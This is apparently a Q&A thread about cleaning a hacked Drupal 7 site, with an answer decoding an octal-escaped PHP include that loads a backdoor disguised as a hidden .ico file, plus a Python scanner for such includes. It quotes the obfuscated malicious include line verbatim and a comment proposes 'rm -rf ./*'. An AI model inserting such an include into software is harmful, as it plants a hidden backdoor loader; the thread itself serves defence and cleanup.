1
votes

My Drupal 7 site has been recently compromised - I guess due to an unpatched critical issue (I was two minor versions older than the latest), but I can't make it clean again.

What's happening:

From time to time (probably triggered by accessing some page) the site gets into an internal error where the root URL shows something like (sorry - I forgot to record it this time) "PHP error, expected ) but , found in ...." followed by a path to an .ico file.

That .ico file contains just some PHP code and is located in different places; usually it has a name like .fsdr4ef.ico and sits in random places like modules/file.

Example content:


and it's much longer.

This .ico include is being called by randomly generated index.php files placed within different dirs (and the code is also in the main index.php in the root folder):

/55b79/

@include "\057d\141t\141/\167e\142/\166i\162t\165a\154s\0571\0670\0676\070/\166i\162t\165a\154/\167w\167/\155o\144u\154e\163/\146i\154e\057.\1467\1433\143f\065c\056i\143o";

/55b79/

What I did so far:

I changed my FTP password
Deleted everything but the sites/ folder
Uploaded the latest Drupal 7 version
Searched for and deleted all index.php files and suspicious .ico files
Changed the Drupal admin password
Updated all modules and removed unused ones

All seemed to be working fine, but after a few days the same issue came back - I really don't know how it can be happening. I even searched within all the .php files to find out where those index.php files could be created, but haven't found anything.

Thanks for any help.

TC

1
If your site is hacked, you HAVE to figure out how it was hacked, or just flush the entire server. For instance, if you have a leaky PHP script which allowed code injection, the infection still can't reach further than the rights the PHP user has in the system, and so just flushing your web folder might be sufficient. But if you don't know, other parts of the server may be hacked, and any attempt to undo it may just be overruled again. You can change the locks, but if the burglar is still inside, it won't help. - GolezTrol
Hi, it's normal commercial hosting - as I said, I changed all passwords and deleted all fake accounts I found in the Drupal user database. So now there are some code remains somewhere, as I used the latest Drupal version. But I can't find the "source" of that. - Tomáš Cigánek
You need to redo everything. You can't be sure something wasn't modified to create a backdoor: serverfault.com/questions/218005/…. - user3783243
Happened to one of the sites I support recently. The hosting company restored the site from backup to fix the problem. You may want to see if your hosting company will do the same thing for you. - Dave
You're talking about Drupal 7 here. Who knows what out-of-date modules (let alone the core) you're using. It's possible the exploit is in the clean version as well and the contributors just ceased support. It's conceivable your site is permanently vulnerable unless you trace down the vulnerability yourself and patch it. Otherwise, I suggest SSHing into the web root and running rm -rf ./* and never using Drupal again... and in case you're not an SSH user, that will delete your whole site. - Kai Qing

1 Answer

2
votes

This is an encoded path:

@include "\057d\141t\141/\167e\142/\166i\162t\165a\154s\0571\0670\0676\070/\166i\162t\165a\154/\167w\167/\155o\144u\154e\163/\146i\154e\057.\1467\1433\143f\065c\056i\143o";

which decodes to (decode from here):

@include "/data/web/virtuals/170768/virtual/www/modules/file/.f7c3cf5c.ico"

This is a backdoor disguised as an icon file. Delete this file and delete all the malicious index.php files. There might also be some files with random names such as rkhqjezh.php. Delete them too. Also look into your existing PHP files: some malicious code might be injected at the beginning of those files too. Remove it. It is a tedious process, but eventually you will be able to delete each of these files. Once you are done with this you might want to change your FTP passwords. Also look at your MySQL logs to see if there is any possible SQL injection.
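As an added example (not the answerer's or the asker's code), here is a Python decoder for PHP double-quoted string escapes and a small scanner that flags include/require statements whose path is written with such escapes, which is how the index.php line quoted above hides its target. It goes beyond the octal escapes shown on the page and also handles PHP's hex and single-character escapes; the sample index.php content is constructed from the question, and the hypothetical benign line is there to show that plain paths are not reported.

```python
import re
from typing import List, Dict

# PHP double-quoted string escapes: octal \NNN (1-3 digits), hex \xHH
# (1-2 digits) and the single-character escapes PHP recognises.
_ESCAPE_RE = re.compile(r'\\([0-7]{1,3}|x[0-9A-Fa-f]{1,2}|[nrtvef\\$"])')
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b",
           "f": "\f", "\\": "\\", "$": "$", '"': '"'}

def decode_php_string(literal: str) -> str:
    """Decode escape sequences exactly as PHP does for a "..." literal.
    Unrecognised backslash sequences are left untouched, like PHP does."""
    def sub(m: "re.Match[str]") -> str:
        esc = m.group(1)
        if esc[0] in "01234567":
            return chr(int(esc, 8) & 0xFF)   # PHP wraps \400 to \000
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        return _SIMPLE[esc]
    return _ESCAPE_RE.sub(sub, literal)

# include/require (with or without the @ error-suppression operator and
# parentheses) whose argument is a double-quoted string literal.
_INCLUDE_RE = re.compile(
    r'@?\s*(include_once|include|require_once|require)\s*\(?\s*"((?:[^"\\]|\\.)*)"',
    re.IGNORECASE)

def find_obfuscated_includes(php_source: str) -> List[Dict[str, object]]:
    """Return each include whose literal path uses escape sequences,
    together with the decoded path, so the target file can be reviewed."""
    hits: List[Dict[str, object]] = []
    for m in _INCLUDE_RE.finditer(php_source):
        raw = m.group(2)
        if "\\" not in raw:
            continue                          # plain path, nothing hidden
        decoded = decode_php_string(raw)
        hits.append({
            "keyword": m.group(1).lower(),
            "raw": raw,
            "decoded": decoded,
            # dot-prefixed file name: hidden from a casual directory listing
            "hidden_file": decoded.rsplit("/", 1)[-1].startswith("."),
        })
    return hits

# Constructed sample: the include from the question's index.php plus one
# hypothetical benign require_once, so the scanner has something to skip.
SAMPLE_INDEX_PHP = r'''<?php
@include "\057d\141t\141/\167e\142/\166i\162t\165a\154s\0571\0670\0676\070/\166i\162t\165a\154/\167w\167/\155o\144u\154e\163/\146i\154e\057.\1467\1433\143f\065c\056i\143o";
require_once "includes/bootstrap.inc";
'''

if __name__ == "__main__":
    for hit in find_obfuscated_includes(SAMPLE_INDEX_PHP):
        print(hit["keyword"], "->", hit["decoded"], "(hidden)" if hit["hidden_file"] else "")
```

Run over a whole web root (for example by feeding each .php file to find_obfuscated_includes), it lists every decoded include target, which is the list of files to inspect and remove before re-deploying a clean copy.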